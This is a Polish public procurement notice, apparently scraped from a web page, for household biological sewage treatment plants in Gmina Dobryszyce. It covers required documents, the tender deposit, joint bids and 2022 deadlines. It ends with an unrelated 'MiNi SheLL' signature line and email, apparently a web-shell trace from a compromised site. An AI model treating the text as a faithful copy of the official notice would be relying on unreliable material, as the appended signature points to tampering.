przyczyn niezależnych od niego nie jest w stanie uzyskać <br/> tych dokumentów – inne odpowiednie dokumenty. <br/> Wymagane potwierdzenie wykonania zamówień określonych w pkt 6.1. ppkt 1 lit. a) do <br/> IDW z załączeniem dowodów określających, że zostały wykonane należycie. Wykaz <br/> znajduje się w załączniku nr 4 do IDW. <br/><br/> b) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w <br/> szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie <br/> robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, <br/> uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia <br/> publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o <br/> podstawie do dysponowania tymi osobami. <br/> Zamawiający wymaga uwzględnienia w niniejszym wykazie osób określonych w pkt 6.1. <br/> ppkt 2 lit. a-b) do IDW, zgodnie z załącznikiem nr 5 do IDW. <br/><br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je <br/> uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów <br/> publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności <br/> podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o <br/> którym mowa w pkt 7.1., dane umożliwiające dostęp do tych środków. Wykonawca nie jest <br/> zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, <br/> jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność. W <br/> przypadku wskazania przez wykonawcę dostępności podmiotowych środków dowodowych pod <br/> określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, <br/> Zamawiający będzie żądał od wykonawcy przedstawienia tłumaczenia na język polski <br/> pobranych samodzielnie przez Zamawiającego podmiotowych środków dowodowych lub <br/> dokumentów, jeżeli zaistnieje taka potrzeba.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/><br/>1) aktualne na dzień składania ofert odpowiednio oświadczenie lub oświadczenia, o których mowa <br/> w pkt 7.1, 7.3 i 7.6.3) IDW,<br/>2) zobowiązanie podmiotu do udostępnienia zasobów, jeżeli wykonawca polega na zasobach innego <br/> podmiotu,<br/>3) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego <br/> wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy ( jeżeli <br/> dotyczy ),<br/>4) w przypadku oferty wspólnej pełnomocnictwo do reprezentowania wszystkich Wykonawców <br/> wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do <br/> reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i <br/> zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie <br/> poświadczonej kopii,<br/>5) dowody równoważności, o których mowa w pkt 3 ppkt 6 IDW, jeżeli wykonawca zaoferował <br/> rozwiązania równoważne w stosunku do określonych w opisie przedmiotu zamówienia,<br/>6) uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, jeżeli wykonawca zastrzegł w ofercie <br/> informacje jako tajemnicę przedsiębiorstwa,<br/>7) dokumenty potwierdzające wniesienie wadium określone pkt 10 IDW. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający określa kwotę wadium w wysokości 15.000,00 złotych.<br/>2. Wadium wykonawca wnosi się przed upływem terminu składania ofert i utrzymuje <br/> nieprzerwanie do dnia upływu terminu związania ofert.<br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących <br/> formach:<br/>1) pieniądzu;<br/> 2) gwarancjach bankowych;<br/> 3) gwarancjach ubezpieczeniowych;<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z <br/> dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( t.j. Dz. <br/> U. z 2020 r., poz. 299 ).<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy <br/> Zamawiającego w:<br/> ESBANK Bank Spółdzielczy w Radomsku. <br/> Nr rachunku: 50 8980 0009 2024 0000 3785 0008 z dopiskiem: <br/><br/> Wadium – „ Budowa przydomowych biologicznych oczyszczalni ścieków realizowanych na <br/> terenie Gminy Dobryszyce ”- Znak sprawy: 271.1.5.2022.<br/><br/>5. Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki <br/> pieniężne wpłyną na konto zamawiającego przed upływem terminu składnia ofert.<br/>6. Pozostałe informacje dot. wadium zawarte zostały w pkt 10 rozdział I SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o zamówienie.<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2)	W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 7.1. IDW, składa każdy z wykonawców. Oświadczenia te dołączone do oferty potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4)	W przypadku określenia przez Zamawiającego warunku dotyczącego zdolności do występowania w obrocie gospodarczym lub zdolności technicznej lub zawodowej wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w pkt 6.4 IDW, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Formularz oświadczenia stanowi załącznik nr 3 do IDW. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj, zakres zmian umowy oraz warunków ich wprowadzenia zostały określone w rozdziale IV SWZ - wzór umowy w sprawie zamówienia publicznego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na mini Portalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na mini Portalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-16 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-13</span></h3> <h3 class="mb-0">8.19.) Umowa ramowa: </h3> Umowa ramowa zawarta zostanie z jednym wykonawcą <h3 class="mb-0">8.20.) Przewiduje się ograniczenie liczby uczestników umowy ramowej: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie jest dofinansowane ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Łodzi. <br/><br/>Osobą uprawnioną do porozumiewania się z Wykonawcami jest: <br/> - w sprawie procedury przetargowej: <br/> Tomasz Bąk; tel. 44/ 681 11 93, e-mail: przetargi@dobryszyce.pl<br/> - w sprawach związanych z przedmiotem zamówienia:<br/> Tomasz Bąk; tel. 44/ 681 11 93, e-mail: przetargi@dobryszyce.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com